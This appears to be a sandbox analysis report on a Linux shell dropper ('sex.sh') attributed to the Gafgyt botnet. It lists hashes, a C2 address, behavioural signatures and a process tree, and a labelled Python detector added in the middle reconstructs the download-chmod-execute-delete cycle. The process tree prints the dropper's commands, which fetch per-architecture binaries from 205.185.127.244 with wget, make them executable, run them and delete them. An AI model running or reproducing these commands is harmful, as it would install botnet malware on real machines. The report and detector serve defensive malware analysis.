Analysis
-
max time kernel
37s -
max time network
41s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
28-09-2024 07:55
Static task
static1
Behavioral task
behavioral1
Sample
sex.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
sex.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
sex.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
sex.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
sex.sh
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral6
Sample
sex.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
sex.sh
Resource
ubuntu2004-amd64-20240508-en
Behavioral task
behavioral8
Sample
sex.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
sex.sh
Resource
ubuntu2404-amd64-20240729-en
General
-
Target
sex.sh
-
Size
1KB
-
MD5
884dc57dd0892038d53a2d4b017504df
-
SHA1
52ab9780591ee9718ce6188a9edafc1afa05dcdf
-
SHA256
d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779
-
SHA512
25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca
Malware Config
Extracted
gafgyt
205.185.127.244:23
Signatures
-
Detected Gafgyt variant 4 IoCs
resource                          yara_rule
behavioral3/files/fstream-1.dat   family_gafgyt
behavioral3/files/fstream-2.dat   family_gafgyt
behavioral3/files/fstream-3.dat   family_gafgyt
behavioral3/files/fstream-4.dat   family_gafgyt
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid   Process
751   chmod
762   chmod
767   chmod
772   chmod
-
Executes dropped EXE 4 IoCs
ioc           pid   Process
/tmp/mips     752   mips
/tmp/mipsel   763   mipsel
/tmp/sh4      768   sh4
/tmp/x86      773   x86
-
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid   Process
651   wget
752   mips
758   rm
759   wget
763   mipsel
765   rm
-
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description                    ioc           Process
File opened for modification   /tmp/mips     wget
File opened for modification   /tmp/mipsel   wget
File opened for modification   /tmp/sh4      wget
File opened for modification   /tmp/x86      wget
Processes
Image    Command line    (child processes of PID 644 are indented one level)
-
/tmp/sex.sh    /tmp/sex.sh
PID:644
-
  /usr/bin/wget    wget http://205.185.127.244/mips
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:651
-
  /bin/chmod    chmod +x mips
  - File and Directory Permissions Modification
  PID:751
-
  /tmp/mips    ./mips
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:752
-
  /bin/rm    rm -rf mips
  - System Network Configuration Discovery
  PID:758
-
  /usr/bin/wget    wget http://205.185.127.244/mipsel
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:759
-
  /bin/chmod    chmod +x mipsel
  - File and Directory Permissions Modification
  PID:762
-
  /tmp/mipsel    ./mipsel
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:763
-
  /bin/rm    rm -rf mipsel
  - System Network Configuration Discovery
  PID:765
-
  /usr/bin/wget    wget http://205.185.127.244/sh4
  - Writes file to tmp directory
  PID:766
-
  /bin/chmod    chmod +x sh4
  - File and Directory Permissions Modification
  PID:767
-
  /tmp/sh4    ./sh4
  - Executes dropped EXE
  PID:768
-
  /bin/rm    rm -rf sh4
  PID:770
-
  /usr/bin/wget    wget http://205.185.127.244/x86
  - Writes file to tmp directory
  PID:771
-
  /bin/chmod    chmod +x x86
  - File and Directory Permissions Modification
  PID:772
-
  /tmp/x86    ./x86
  - Executes dropped EXE
  PID:773
-
  /bin/rm    rm -rf x86
  PID:775
-
  /usr/bin/wget    wget http://205.185.127.244/arm61
  PID:776
-
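Added example, not part of the sandbox report or of the sample: a small Python detector that reconstructs the per-architecture download, chmod, execute, delete cycle from process-start events and pulls the network and file IoCs out of them. The event records are constructed from the process tree above (PIDs, image paths and command lines are the tree's); the parent-pid column is an assumption taken from the tree's nesting, and the chmod/rm/download matchers are deliberately wider than the exact forms seen here (octal modes, ./ or /tmp/ prefixes, curl) so the same logic covers common dropper variants.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-start record: pid, parent pid, executable path, command line."""
    pid: int
    ppid: int
    exe: str
    cmdline: str


# Constructed from the process tree in the report above.  PIDs, executable
# paths and command lines are the tree's; the ppid column is an assumption
# (the tree shows every child one level below the dropper, PID 644).
EVENTS = [
    ProcEvent(644, 1,   "/tmp/sex.sh",   "/tmp/sex.sh"),
    ProcEvent(651, 644, "/usr/bin/wget", "wget http://205.185.127.244/mips"),
    ProcEvent(751, 644, "/bin/chmod",    "chmod +x mips"),
    ProcEvent(752, 644, "/tmp/mips",     "./mips"),
    ProcEvent(758, 644, "/bin/rm",       "rm -rf mips"),
    ProcEvent(759, 644, "/usr/bin/wget", "wget http://205.185.127.244/mipsel"),
    ProcEvent(762, 644, "/bin/chmod",    "chmod +x mipsel"),
    ProcEvent(763, 644, "/tmp/mipsel",   "./mipsel"),
    ProcEvent(765, 644, "/bin/rm",       "rm -rf mipsel"),
    ProcEvent(766, 644, "/usr/bin/wget", "wget http://205.185.127.244/sh4"),
    ProcEvent(767, 644, "/bin/chmod",    "chmod +x sh4"),
    ProcEvent(768, 644, "/tmp/sh4",      "./sh4"),
    ProcEvent(770, 644, "/bin/rm",       "rm -rf sh4"),
    ProcEvent(771, 644, "/usr/bin/wget", "wget http://205.185.127.244/x86"),
    ProcEvent(772, 644, "/bin/chmod",    "chmod +x x86"),
    ProcEvent(773, 644, "/tmp/x86",      "./x86"),
    ProcEvent(775, 644, "/bin/rm",       "rm -rf x86"),
    ProcEvent(776, 644, "/usr/bin/wget", "wget http://205.185.127.244/arm61"),
]

STAGES = ("download", "chmod", "exec", "delete")

# Each pattern captures the artifact name the stage acts on.  The chmod, rm and
# download forms are wider than the report's exact command lines (octal modes,
# ./ or /tmp/ prefixes, curl) so one matcher covers common dropper variants.
STAGE_PATTERNS = [
    ("download", re.compile(r"^(?:wget|curl)\b.*?https?://[^/\s]+/(\S+)")),
    ("chmod",    re.compile(r"^chmod\s+(?:\+x|[0-7]{3,4})\s+(?:\./|/tmp/)?(\S+)$")),
    ("exec",     re.compile(r"^(?:\./|/tmp/)(\S+)$")),
    ("delete",   re.compile(r"^rm\s+(?:-\S+\s+)*(?:\./|/tmp/)?(\S+)$")),
]

URL_RE = re.compile(r"https?://([^/\s]+)/\S+")


def find_dropper_chains(events):
    """Map ppid -> artifact name -> {stage: pid}.

    Only the first occurrence of each stage per artifact is kept, in event
    order, so a later repeat cannot mask an out-of-order sequence.
    """
    chains = {}
    for ev in events:
        for stage, pat in STAGE_PATTERNS:
            m = pat.match(ev.cmdline)
            if m:
                per_parent = chains.setdefault(ev.ppid, {})
                per_parent.setdefault(m.group(1), {}).setdefault(stage, ev.pid)
                break
    return chains


def is_complete(stages):
    """True when download, chmod, exec and delete all occurred, in that order."""
    pids = [stages.get(s) for s in STAGES]
    return None not in pids and pids == sorted(pids)


def complete_chains(chains, ppid):
    """Artifact names under ppid that went through the full four-stage cycle."""
    return sorted(n for n, st in chains.get(ppid, {}).items() if is_complete(st))


def extract_iocs(events):
    """Remote hosts, fetched URLs and /tmp executables seen in the events."""
    hosts, urls, paths = set(), [], set()
    for ev in events:
        for m in URL_RE.finditer(ev.cmdline):
            hosts.add(m.group(1))
            urls.append(m.group(0))
        if ev.exe.startswith("/tmp/"):
            paths.add(ev.exe)
    return {"hosts": sorted(hosts), "urls": urls, "dropped_paths": sorted(paths)}


if __name__ == "__main__":
    chains = find_dropper_chains(EVENTS)
    for ppid, artifacts in chains.items():
        done = complete_chains(chains, ppid)
        print(f"parent {ppid}: {len(done)} complete cycle(s) {done}")
        for name, st in artifacts.items():
            if not is_complete(st):
                print(f"  incomplete: {name} -> {st}")
    print(extract_iocs(EVENTS))
```

Run as a script it reports four complete cycles under PID 644 (mips, mipsel, sh4, x86) and one incomplete artifact, arm61, whose wget (PID 776) is the last process in the tree with no chmod, exec or rm after it. On a real sensor feed the ppid comes from the kernel rather than being assumed, and a parent with two or more complete cycles against the same remote host is a strong multi-architecture dropper signal regardless of the binary names used.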
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
176KB
MD5
24e07a16008a42f0a8dceb166b4b44cd
SHA1
87f80fc2998304bc8735479faa75f509a6d5db13
SHA256
c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f
SHA512
b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5
-
Filesize
176KB
MD5
ac28a3dfa3ed9b815a8021a362b06607
SHA1
93455b3775f586e230d8879489f9a6062de70677
SHA256
3d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5
SHA512
94c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e
-
Filesize
123KB
MD5
5ec3c0e18b6fbc6e37bd611e2df8f9a4
SHA1
de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d
SHA256
9b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6
SHA512
76f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20
-
Filesize
127KB
MD5
678363120cd2661f040670b90f211243
SHA1
57d75e1c42243d08eb78623e6cdc6b066994a7ee
SHA256
cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a
SHA512
5a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55